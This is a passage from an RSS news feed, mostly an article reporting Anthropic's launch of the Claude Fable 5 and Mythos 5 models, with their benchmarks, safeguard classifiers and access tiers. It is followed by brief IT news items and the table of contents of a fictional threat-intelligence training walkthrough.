href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>GPT-5.4</p></td><td><p>$2.50</p></td><td><p>$15.00</p></td><td><p>$17.50</p></td><td><p><a href="https://openai.com/api/pricing/">OpenAI</a></p></td></tr><tr><td><p>Gemini 3.1 Pro Preview (&gt;200K)</p></td><td><p>$4.00</p></td><td><p>$18.00</p></td><td><p>$22.00</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>Claude Opus 4.8</p></td><td><p>$5.00</p></td><td><p>$25.00</p></td><td><p>$30.00</p></td><td><p><a href="https://platform.claude.com/docs/en/about-claude/pricing">Anthropic</a></p></td></tr><tr><td><p>GPT-5.5</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://openai.com/api/pricing/">OpenAI</a></p></td></tr><tr><td><p><b>Claude Fable 5 / Claude Mythos 5</b></p></td><td><p><b>$10.00</b></p></td><td><p><b>$50.00</b></p></td><td><p><b>$60.00</b></p></td><td><p><b></b><a href="https://platform.claude.com/docs/en/about-claude/models/overview"><b>Anthropic</b></a></p></td></tr></tbody></table><p>For developers, Fable 5 is available through the Claude API as <code>claude-fable-5</code>. Anthropic says Fable 5 is fully available today on the Claude API and on consumption-based Enterprise plans.</p><p>For subscription users, the rollout is more complicated. Anthropic says Fable 5 will be included on Pro, Max, Team and seat-based Enterprise plans at no extra cost from today through June 22. </p><p>On June 23, the company plans to remove Fable 5 from those plans, after which using it will require usage credits. Anthropic says it aims to restore Fable 5 as a standard part of subscription plans as quickly as possible.</p><h2><b>The difference between Fable 5 and Mythos 5</b></h2><p>Anthropic is not presenting Fable 5 and Mythos 5 as two separate models in the usual “small versus large” sense. Instead, they appear to share the same base capability level. The difference is access <i>control — </i>that is, how easily it will be for users to get their hands on the models, and the guardrails embedded in each.</p><p>As previously mentioned Fable 5 includes a new safeguard layer that detects certain high-risk requests — including cybersecurity, biology and chemistry, and attempts to distill the model’s capabilities into other systems — and routes those requests to Claude Opus 4.8. </p><p>Mythos 5 lifts some of those restrictions for trusted users working in approved domains.</p><p>In practical terms, Mythos 5 is more powerful for sensitive cyber and biology work because it can answer in areas where Fable 5 falls back. </p><p>For most ordinary enterprise and developer tasks, however, Anthropic says Fable 5 performs effectively the same as Mythos 5.</p><p>The launch also signals how Anthropic plans to bring frontier models with dangerous dual-use capabilities into the market: not by releasing all capabilities to everyone, and not by simply refusing risky questions, but by routing some requests to a less capable model while keeping the stronger model available for the majority of everyday work.</p><h2><b>A major improvement in autonomous coding</b></h2><p>For enterprise buyers, the most immediate use case is likely software engineering. Anthropic says Fable 5 can work unattended for longer and with more independence than previous Claude models, which is exactly the capability enterprises need if they want AI agents to do more than autocomplete code or answer developer questions.</p><p>On <b>SWE-bench Pro, which measures a model's ability to complete difficult software engineering tasks, Anthropic says Fable 5 and Mythos 5 reach 80.3%</b>, vastly outperforming OpenAI's latest and greatest general model GPT-5.5, which scored 58.6%. </p><p>On Cognition’s FrontierCode Diamond benchmark, which tests high-quality, maintainable agentic coding, the models score 29.3%, compared with 13.4% for Claude Opus 4.8 and 5.7% for GPT-5.5, according to the benchmark table included in Anthropic’s materials. </p><p>Anthropic also says Fable 5 scores highest among frontier models on FrontierCode even at medium reasoning effort, suggesting the model may deliver stronger coding results without always needing maximum compute.</p><p>The most striking customer example comes from Stripe. Anthropic says Stripe tested Fable 5 in a 50-million-line Ruby codebase and found that the model completed a codebase-wide migration in one day that otherwise would have taken a team more than two months by hand. Stripe said, “Fable 5 compresses months of engineering into days. In our 50-million-line Ruby codebase, it did in a day what would've taken us more than two months by hand.”</p><p>Other early users describe the model as especially useful for long-horizon development tasks. Cursor said, “Fable 5 is the state of the art model on CursorBench. It's opened up a class of long-horizon problems that were out of reach for earlier models.” Replit said Fable 5 is the highest-performing model it has tested on ViBench, its end-to-end “vibe-coding” benchmark, and that it builds apps in less time with fewer tokens. Figma said Fable 5 is “a clear step forward on agentic coding and prototyping.”</p><p>This is the enterprise shift Anthropic is trying to sell: AI coding systems that can take on larger units of work, not just individual tickets. That could include codebase migrations, app prototyping, pull request review, test generation, debugging across unfamiliar tools, user interface design and multi-step internal software projects.</p><p>Base44 said, “Fable 5 is much deeper and better at one-shotting full apps, and its tool calling is excellent.” Genspark said, “Fable 5 came out #1 on our evals, winning head-to-head against every model we tested. It was significantly stronger on the hardest tasks in the set — UI design and game coding.” Rakuten said, “At the highest effort, Fable 5 reflects on and validates its own work. For us, that's what makes highly autonomous operations possible — the extra thinking pays for itself.”</p><p>For CTOs and engineering leaders, that suggests the model’s value may come less from raw code generation and more from sustained execution: understanding an intent, planning steps, calling tools, checking its own work and continuing through a task without constant human steering.</p><h2><b>Knowledge work, finance, legal and operations</b></h2><p>Anthropic is also positioning Fable 5 as a stronger model for enterprise knowledge work. On GDPval-AA, Anthropic reports a score of 1932 for Fable 5 and Mythos 5, compared with 1890 for Claude Opus 4.8, 1769 for GPT-5.5 and 1314 for Gemini 3.1 Pro. </p><p>On GDPpdf, a benchmark focused on visual document reasoning, Fable 5 and Mythos 5 score 29.8% without tools, compared with 22.5% for Opus 4.8, 24.9% for GPT-5.5 and 16.7% for Gemini 3.1 Pro.</p><p>That matters for enterprises because much of corporate work still lives in messy documents: PDFs, spreadsheets, charts, reports, contracts, filings, slide decks and screenshots. Anthropic says Fable 5 shows gains in document-based reasoning, chart and table interpretation and complex problem solving.</p><p>Hex said, “Fable 5 is the first to break 90% on our core analytics benchmark of complex, long-running analytical tasks — a 10-point jump over Opus. On the hardest questions, it shows strong judgment and attention to nuance.” Hebbia said Fable 5 was the highest-scoring model on its Finance Benchmark for senior-level reasoning, with double-digit gains in document reasoning, chart and table interpretation, and problem solving.</p><p>The finance examples are notable because they point to AI agents moving beyond summarization into higher-stakes analytical workflows. </p><p>IMC said Fable 5 “aced our trading-analysis evaluations nearly across the board: factual lookup, conceptual reasoning, root-cause analysis, expected-value analysis.” Optiver said the model was stronger than Opus 4.8 on its trading benchmark and “remarkably consistent,” scoring identically across repeated runs. Balyasny Asset Management said Fable 5 was the strongest finance-first model it had tested.</p><p>Legal and operations teams may also see immediate impact. Crosby Legal said, “Fable 5 feels materially different. In blind review, our lawyers found its redlines matched or beat our current model every time.” Notion said the model can take work “you'd chip away at all afternoon” and turn messy notes into a functioning project plan. Zapier said Fable 5 is the new leader on AutomationBench and is more autonomous than Opus 4.8: “Where Opus stops to ask, Fable 5 keeps looking.”</p><p>For enterprise software vendors, that points toward more capable embedded agents in workflow products: agents that can review a contract, update a project plan, assemble a spreadsheet, inspect a chart, file a ticket, run a query, call an internal API and keep going until the work is complete.</p><h2><b>Vision and interface understanding</b></h2><p>Anthropic says Fable 5 is also its strongest vision model. In its launch materials, the company says the model can extract precise numbers from detailed scientific figures and complete vision-based tasks such as rebuilding a web app’s source code from screenshots alone.</p><p>That has immediate implications for enterprise automation. Many business processes still depend on visual interfaces that are not cleanly exposed through APIs: dashboards, PDFs, forms, legacy apps, screenshots, scans and image-heavy reports. A stronger vision model could help agents operate across those environments with less custom integration work.</p><p>Anthropic also says Fable 5 needs less scaffolding than previous Claude models. As an example, the company says earlier Claude models struggled to play Pokémon FireRed even with extra tools, while <a href="https://youtu.be/CIQBP1w4B1M?si=QCoJ9amBEVMqoTUl">Fable 5 impressively beat the game using a minimal vision-only harness. </a>Anthropic posted a fast forwarded video of its playthrough to YouTube and in its blog post:</p><div></div><p>The point is not gaming itself, but the broader agentic skill: reading a visual environment, remembering progress, deciding what to do next and executing over a long horizon.</p><p>In another internal test, Anthropic says it had the model play the deck-building game Slay the Spire with access to persistent file-based memory. The company says persistent memory improved Fable 5’s performance three times more than it improved Opus 4.8’s, and that Fable reached the game’s final act three times more often. For enterprise users, this suggests Fable 5 may make better use of notes, logs and stored context during multi-step work.</p><p>That could matter for internal agents that operate over days or weeks: sales operations agents that track account research, engineering agents that manage migrations, finance agents that update models, or support agents that remember what they tried across many turns.</p><h2><b>From restricted cyber model to general-purpose enterprise AI</b></h2><p>The announcement follows Anthropic’s April 2025 rollout of Claude Mythos Preview through <a href="https://venturebeat.com/technology/anthropic-says-its-most-powerful-ai-cyber-model-is-too-dangerous-to-release">Project Glasswing</a>, a restricted program for cyber defenders, critical infrastructure providers and major software maintainers. Anthropic created Glasswing after internal evaluations showed Mythos-class models could find and exploit software vulnerabilities at a level that raised meaningful misuse concerns.</p><p>Following the debut of Glasswing and Mythos, <a href="https://www.nextgov.com/cybersecurity/2026/04/anthropics-glasswing-initiative-raises-questions-us-cyber-operations/412721/">U.S. officials and intelligence agencies began weighing</a> how such models could reshape both cyber defense and offensive operations, while Sen. Mark Warner warned that AI-assisted vulnerability discovery should force industry to “accelerate and reprioritize patching.” Financial regulators also took notice: <a href="https://www.theguardian.com/technology/2026/apr/22/what-is-anthropic-mythos-ai-threat-global-cybersecurity">The Guardian reported</a> that Mythos entered discussions among senior banking officials and regulators in the U.S. and U.K. because of fears that AI-accelerated cyberattacks could threaten payment systems and broader financial stability.</p><p>The reaction has not been limited to alarm. Governments also want access: <a href="https://www.reuters.com/legal/litigation/south-korea-secures-access-anthropics-mythos-ai-model-science-ministry-says-2026-06-03/">Reuters reported</a> that South Korea’s national internet security agency had secured Mythos access through Project Glasswing, reflecting a broader geopolitical race to use frontier AI for national cyber defense. At the same time, Anthropic has faced scrutiny over whether it can safely gate the very capabilities it says are too risky for general release. <a href="https://www.theverge.com/ai-artificial-intelligence/917644/anthropic-claude-mythos-breach-humiliation">The Verge reported</a> that unauthorized users accessed Mythos after its limited rollout, calling the incident damaging for a company that has built its brand around responsible AI. </p><p>Critics have also questioned whether Anthropic’s warning-heavy framing risks becoming a form of market positioning, since it casts the company as both the source of the new capability and the gatekeeper deciding which governments, companies and researchers get to use it.</p><p>With Fable 5, Anthropic is leaning into its gatekeeper role, attempting to separate the general enterprise value of a Mythos-class model from the riskiest parts of its capability profile. The company says Fable 5 can handle software engineering, research, visual reasoning, document analysis and long-running agentic workflows, while classifiers block or reroute requests that could provide what Anthropic calls “uplift” to malicious actors.</p><p>Those classifiers cover three main areas. </p><ol><li><p>Cybersecurity, where Anthropic says Mythos-class models can discover and exploit vulnerabilities and perform broader “agentic hacking” tasks such as reconnaissance, discovery and lateral movement. </p></li><li><p>Biology and chemistry, where the company says the same reasoning that can help researchers design therapies could also help well-resourced malicious actors pursue dangerous biological work. </p></li><li><p>Model distillation, where Anthropic says users may try to extract Claude’s capabilities to train competing models, including models that could be released without similar safeguards.</p></li></ol><p>When Fable 5’s classifiers detect one of those categories, the response is automatically handled by Claude Opus 4.8. Anthropic says users will be told when this happens. That is a notable product decision: rather than declining those requests outright, Anthropic is trying to keep the user experience functional while reducing access to the most capable version of the model in sensitive areas.</p><p>Anthropic says it red-teamed the new classifier system internally and externally. The company says an internal bug bounty produced no universal jailbreaks after more than 1,000 hours of testing, and external red-teaming organizations also failed to find a universal jailbreak. One external partner found that Fable 5 complied with zero harmful single-turn cyber requests related to planning cyberattacks, exploit development or defense evasion, even when prompts used any of 30 public jailbreak techniques, according to Anthropic.</p><p>The company is still acknowledging tradeoffs. Anthropic says the safeguards are deliberately cautious and may sometimes trigger on benign requests. That could frustrate security professionals, biology researchers and advanced enterprise users whose legitimate work overlaps with the blocked categories. The company says it plans to reduce false positives over time.</p><h2><b>Mythos 5 and the restricted frontier</b></h2><p>While Fable 5 is the broad commercial launch, Mythos 5 is the model to watch for enterprises operating in security, critical infrastructure and life sciences.</p><p>The company says all users with Claude Mythos Preview access can upgrade to Mythos 5 beginning today. It plans to expand access through a trusted access program, in collaboration with the U.S. government.</p><p>The distinction is important for sectors where the blocked capabilities are not edge cases but core workflows. A security team may need to reproduce vulnerabilities, test exploitability, analyze lateral movement or simulate attacker behavior in a controlled environment. A biology research team may need to reason through molecular design workflows that would trigger general-use safeguards. Fable 5 is not designed to give every user unrestricted access to those capabilities; Mythos 5 is designed for vetted users who need them.</p><p>Anthropic says Mythos 5 has the strongest cybersecurity capabilities of any model in the world. In the company’s benchmark table, the model family scores 78.0% on ExploitBench, compared with 69.0% for Claude Mythos Preview, 40.0% for Opus 4.8 and 34.0% for GPT-5.5. On CyberGym, Anthropic’s chart shows Mythos 5 at 83.8%, slightly ahead of Mythos Preview at 83.1% and far above Opus 4.8 with default safeguards.</p><p>The company is making a similar argument in biology. Anthropic says Mythos-class models outperform dedicated protein language models on a task involving adeno-associated viruses, a delivery mechanism used in gene therapies. The company frames that as both promising and risky: the same capability that could help gene therapy research could also be misused in dangerous biological work.</p><p>Anthropic says its internal protein design experts used Mythos 5 to accelerate parts of the drug design process by about tenfold. In one example, the company says Mythos 5, using protein design and bioinformatics tools without human assistance, matched or beat skilled human operators by choosing binding sites, selecting and running tools, and recovering from failures. Anthropic says nine of 14 protein targets in the study produced strong candidates for drug design that it is now investigating.</p><p>The company also says Mythos 5 produced novel molecular biology hypotheses that Anthropic scientists preferred over Opus-class model hypotheses about 80% of the time in blinded comparisons. Anthropic says several of those ideas have advanced to experimental evaluation, and one hypothesis involving an E. coli protein was later corroborated by an independent lab working on the same problem.</p><p>Those claims are potentially significant, but they should be treated carefully until more details are published. Anthropic says it intends to publish additional results in the coming months. For now, the strongest enterprise implication is directional: the company believes its highest-end models can already perform parts of scientific research workflows with less human intervention than prior systems.</p><h2><b>New, longer data retention requirement</b></h2><p>The company also introduced a new data-retention policy for Mythos-class models. Anthropic says it will require 30-day retention for all traffic on Fable 5, Mythos 5 and future models with similar or higher capability levels, across both first-party and third-party surfaces. The company says it will not use that data to train new Claude models or for non-safety purposes, and says it has added privacy protections including logging human access and deleting the data after 30 days in almost all cases.</p><p>That policy may become one of the most important enterprise buying questions around Fable 5. Many businesses want frontier AI capability but also want strict control over data retention, especially in regulated sectors. Anthropic’s position is that stronger monitoring is necessary for models with this level of capability. Enterprise customers will have to decide whether the capability gain justifies the retention requirement.</p><h2><b>Enterprise implications</b></h2><p>The broader enterprise significance of Fable 5 is that Anthropic is trying to commercialize a more autonomous class of AI model without exposing all of its capabilities to every user. That could become a template for how frontier labs release increasingly powerful systems: one model family, multiple access tiers, and domain-specific restrictions depending on user trust and risk.</p><p>If Fable 5 performs as Anthropic and early customers describe, developers may hand off larger tasks: code migrations, refactors, UI builds, test writing, bug fixing, documentation, internal tooling and multi-step app creation. </p><p>For knowledge-work-heavy enterprises, Fable 5 could make AI more useful in workflows where earlier models were too brittle: finance research, spreadsheet analysis, legal redlines, procurement review, board materials, market research, sales operations and project planning. The main gain is not just better answers; it is fewer turns, fewer corrections and more ability to keep working through ambiguity.</p><p>For security teams, the launch is more complicated. Most organizations will get Fable 5, not unrestricted Mythos 5. That means they may see stronger general coding and analysis, but not full access to the cyber capabilities Anthropic considers risky. Trusted defenders inside Project Glasswing will get Mythos 5, giving them a more direct way to use the model for vulnerability discovery and defensive testing.</p><p>For life sciences companies, the pattern is similar. Fable 5 may help with general research, literature analysis, data interpretation and scientific reasoning, but the more sensitive biological capabilities will be restricted. Anthropic is effectively creating a separate access path for vetted researchers whose work requires capabilities that could be dangerous in the wrong hands.</p><p>The launch also raises competitive pressure across the AI industry. Anthropic is claiming state-of-the-art results across agentic coding, knowledge work, vision, cybersecurity, legal reasoning, spatial reasoning and health benchmarks. But the more strategically important claim may be that it has found a workable release mechanism for models above its Opus class. If Fable 5’s safeguards hold up under real-world use, Anthropic will argue it can bring more powerful models to market sooner without fully opening the riskiest capabilities.</p><p>That is still a large “if.” The enterprise market will test not only Fable 5’s benchmark performance, but also its reliability, false-positive rate, data-retention tradeoffs and cost at scale. A model that can complete more work autonomously can also burn more tokens, trigger more governance questions and create new review burdens for teams that must verify its output.</p><p>Still, today’s launch marks a clear shift in the Claude lineup. Opus is no longer Anthropic’s top commercial capability tier. Mythos-class models now sit above it. Fable 5 is the first version of that tier for general users; Mythos 5 is the restricted version for trusted high-risk work. Together, they show how Anthropic plans to push frontier AI deeper into enterprise workflows while trying to keep the most dangerous capabilities gated.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Russia’s solution to its VPN crackdown breaking the internet? A state-owned VPN]]></title>
<description><![CDATA[Russia's internet regulator, Roskomnadzor, has a unique solution for the problems caused by its own VPN crackdown: creating a state-controlled VPN. The plan is meant to restore access to vital developer tools, but the IT community fears it could become a tool for surveillance.]]></description>
<link>https://tsecurity.de/de/3585059/it-nachrichten/russias-solution-to-its-vpn-crackdown-breaking-the-internet-a-state-owned-vpn/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3585059/it-nachrichten/russias-solution-to-its-vpn-crackdown-breaking-the-internet-a-state-owned-vpn/</guid>
<pubDate>Tue, 09 Jun 2026 18:01:33 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Russia's internet regulator, Roskomnadzor, has a unique solution for the problems caused by its own VPN crackdown: creating a state-controlled VPN. The plan is meant to restore access to vital developer tools, but the IT community fears it could become a tool for surveillance.]]></content:encoded>
</item>
<item>
<title><![CDATA[Burn-9 Preview (PC)]]></title>
<description><![CDATA[It’s somewhat unclear what the agent I’m trying to keep alive can actually do. She’s fitted with a remotely controlled defibrillator, but her suit is unable to keep her warm after she gets shot down in Antarctica. I help her avoid drones at first, moving through pipes to make sure she’s not detec...]]></description>
<link>https://tsecurity.de/de/3584923/it-security-nachrichten/burn-9-preview-pc/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3584923/it-security-nachrichten/burn-9-preview-pc/</guid>
<pubDate>Tue, 09 Jun 2026 17:09:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It’s somewhat unclear what the agent I’m trying to keep alive can actually do. She’s fitted with a remotely controlled defibrillator, but her suit is unable to keep her warm after she gets shot down in Antarctica. I help her avoid drones at first, moving through pipes to make sure she’s not detected, but then she suddenly decides that she can take one down and hack it.

While guiding her to potential safety, I’m trying to understand what the wider conspiracy might be. The base harbors a big secret, and no one wants to say exactly what the threat might be. Only one satellite can work in this weather. A hacker is hinting that something more sinister is going on. And no one is ready to say anything true about Burn-9.
The video game is developed by 14 Hours Productions and published by Fellow Traveller. I played a preview version of it on Steam. The title mixes techno thriller inspirations and indirect control in some intriguing ways.

The major inspiration, clear from t...]]></content:encoded>
</item>
<item>
<title><![CDATA[Nvidia next? Broadcom's value dropped by more than $440 billion as it posts disappointing forward outlook, prompting fears of AI bubble burst]]></title>
<description><![CDATA[Broadcom delivers stellar earnings report and in-line guidance, but investors respond by dumping shares, highlighting concerns about an AI bubble in the making.]]></description>
<link>https://tsecurity.de/de/3584272/it-nachrichten/nvidia-next-broadcoms-value-dropped-by-more-than-440-billion-as-it-posts-disappointing-forward-outlook-prompting-fears-of-ai-bubble-burst/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3584272/it-nachrichten/nvidia-next-broadcoms-value-dropped-by-more-than-440-billion-as-it-posts-disappointing-forward-outlook-prompting-fears-of-ai-bubble-burst/</guid>
<pubDate>Tue, 09 Jun 2026 13:17:56 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Broadcom delivers stellar earnings report and in-line guidance, but investors respond by dumping shares, highlighting concerns about an AI bubble in the making.]]></content:encoded>
</item>
<item>
<title><![CDATA[CISO role changes as cyber-risk appetites in the C-suite grow]]></title>
<description><![CDATA[As cybersecurity fears in the C-suite wane, the cyber-risk appetites of executives and boards are changing. Find out what it means for cybersecurity spending and the CISO role.]]></description>
<link>https://tsecurity.de/de/3582866/it-security-nachrichten/ciso-role-changes-as-cyber-risk-appetites-in-the-c-suite-grow/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3582866/it-security-nachrichten/ciso-role-changes-as-cyber-risk-appetites-in-the-c-suite-grow/</guid>
<pubDate>Mon, 08 Jun 2026 22:52:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[As cybersecurity fears in the C-suite wane, the cyber-risk appetites of executives and boards are changing. Find out what it means for cybersecurity spending and the CISO role.]]></content:encoded>
</item>
<item>
<title><![CDATA[Department of Work and Pensions' answer to AI job fears is a bot to polish your CV]]></title>
<description><![CDATA[Whitehall says Work Assistant will help jobseekers apply around the clock – provided employers don't mind machine-written applications]]></description>
<link>https://tsecurity.de/de/3581323/it-nachrichten/department-of-work-and-pensions-answer-to-ai-job-fears-is-a-bot-to-polish-your-cv/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581323/it-nachrichten/department-of-work-and-pensions-answer-to-ai-job-fears-is-a-bot-to-polish-your-cv/</guid>
<pubDate>Mon, 08 Jun 2026 13:47:57 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Whitehall says Work Assistant will help jobseekers apply around the clock – provided employers don't mind machine-written applications]]></content:encoded>
</item>
<item>
<title><![CDATA[UK's answer to AI job fears is a bot to polish your CV]]></title>
<description><![CDATA[Whitehall says Work Assistant will help jobseekers apply around the clock – provided employers don't mind machine-written applications]]></description>
<link>https://tsecurity.de/de/3581171/it-nachrichten/uks-answer-to-ai-job-fears-is-a-bot-to-polish-your-cv/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581171/it-nachrichten/uks-answer-to-ai-job-fears-is-a-bot-to-polish-your-cv/</guid>
<pubDate>Mon, 08 Jun 2026 12:48:05 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Whitehall says Work Assistant will help jobseekers apply around the clock – provided employers don't mind machine-written applications]]></content:encoded>
</item>
<item>
<title><![CDATA[UK gov's answer to AI job fears: An AI bot to polish your CV]]></title>
<description><![CDATA[Whitehall's latest response to AI-driven job anxiety is, naturally, more AI]]></description>
<link>https://tsecurity.de/de/3581055/it-nachrichten/uk-govs-answer-to-ai-job-fears-an-ai-bot-to-polish-your-cv/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581055/it-nachrichten/uk-govs-answer-to-ai-job-fears-an-ai-bot-to-polish-your-cv/</guid>
<pubDate>Mon, 08 Jun 2026 12:18:04 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Whitehall's latest response to AI-driven job anxiety is, naturally, more AI]]></content:encoded>
</item>
<item>
<title><![CDATA[Two New Studies Ask: Did the iPhone Cause Birthrates to Decline?]]></title>
<description><![CDATA[Modern smartphones rolled out in 2007, the year that fertility rates began falling. Two studies say that is not a coincidence.]]></description>
<link>https://tsecurity.de/de/3580936/it-nachrichten/two-new-studies-ask-did-the-iphone-cause-birthrates-to-decline/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580936/it-nachrichten/two-new-studies-ask-did-the-iphone-cause-birthrates-to-decline/</guid>
<pubDate>Mon, 08 Jun 2026 11:17:03 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Modern smartphones rolled out in 2007, the year that fertility rates began falling. Two studies say that is not a coincidence.]]></content:encoded>
</item>
<item>
<title><![CDATA[Stock markets fall as concerns persist over tech firms at heart of AI boom]]></title>
<description><![CDATA[Falls follow sharp sell-off of US tech stock last week while oil prices jump after Iran and Israel exchange strikesBusiness live – latest updatesGlobal stock markets have fallen amid concern about the prospects for tech stocks while oil prices have risen as attacks in the Middle East stoked fears...]]></description>
<link>https://tsecurity.de/de/3580811/ai-nachrichten/stock-markets-fall-as-concerns-persist-over-tech-firms-at-heart-of-ai-boom/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580811/ai-nachrichten/stock-markets-fall-as-concerns-persist-over-tech-firms-at-heart-of-ai-boom/</guid>
<pubDate>Mon, 08 Jun 2026 10:32:39 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Falls follow sharp sell-off of US tech stock last week while oil prices jump after Iran and Israel exchange strikes</p><ul><li><p><a href="https://www.theguardian.com/business/live/2026/jun/08/stock-markets-fall-oil-jumps-middle-east-conflict-ai-boom-falters-live-news-updates">Business live – latest updates</a></p></li></ul><p>Global stock markets have fallen amid concern about the prospects for tech stocks while oil prices have risen as <a href="https://www.theguardian.com/world/2026/jun/08/israel-netanyahu-airstrikes-iran-retaliation-defies-trump">attacks in the Middle East</a> stoked fears that a fragile truce in the region could break.</p><p>Stock markets in Asia and Europe fell on Monday after a sharp sell-off in US tech stocks late last week, as investors fretted over how companies at the forefront of the artificial intelligence boom would fund their “eye-watering” spending plans.</p> <a href="https://www.theguardian.com/business/2026/jun/08/stock-markets-fall-tech-firms-ai-boom-oil-prices-iran-israel">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[CTI as a Code in Practice: Reactive Investigation — LifeTech Pharma]]></title>
<description><![CDATA[A complete walkthrough of the methodology applied to a real training scenario: pharmaceutical IP theft, dual entry points, and a DCSync that changes everything.All organizations, names, and data are fictional. This is training assignment A01 from the CTI as a Code repository.Based on the methodol...]]></description>
<link>https://tsecurity.de/de/3580443/hacking/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580443/hacking/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma/</guid>
<pubDate>Mon, 08 Jun 2026 06:38:21 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4><strong>A complete walkthrough of the methodology applied to a real training scenario: pharmaceutical IP theft, dual entry points, and a DCSync that changes everything.</strong></h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*l8B3xIJssFbBTn0IvOu6Ng.png"></figure><p><em>All organizations, names, and data are fictional. This is training assignment A01 from the CTI as a Code repository.</em></p><h3>Based on the methodology: “CTI as a Code”</h3><p><a href="https://medium.com/@1200km/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46">CTI as a Code: Complete Step-by-Step Methodology</a></p><h3>Contents</h3><ol><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#276c"><strong>The Scenario</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#8c81"><strong>Step 00: Clone, Initialize, and Fill the Template</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#cd59"><strong>Step 0: Intake — What the First Call Captures</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#999a"><strong>Step 1–2: Project Setup and Scope</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#7b9a"><strong>Step R1: Evidence Inventory — What Exists and What Is Missing</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#a778"><strong>Step R1.5: Hands-On Evidence Analysis — VS Code Investigation</strong></a><strong><br></strong><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#966d">1. CrowdStrike Alert — JSON in VS Code</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#2702">2. Decode the PowerShell Payload</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#2db4">3. M365 Message Trace — Rainbow CSV</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#13b3">4. Azure AD Sign-In Analysis</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#6238">5. VPN Log Analysis</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#b73e">6. NGFW Log Analysis — Rainbow CSV</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#a734">7. SQL Audit Log Analysis</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#ecca">8. Windows Security Event Log Analysis</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#13de">9. Cross-File Pivot — VS Code Global Search</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#9a59">10. IOC Enrichment — REST Client</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#0bd0">11. Sandbox Analysis — Submit the Binary</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#da15">12. Static Binary Analysis — Hex Editor + Terminal</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#97f1">13. Infrastructure Pivot — REST Client + Global Search</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#c0c4">14. Splunk Correlation (SIEM Validation)</a></li><li><a 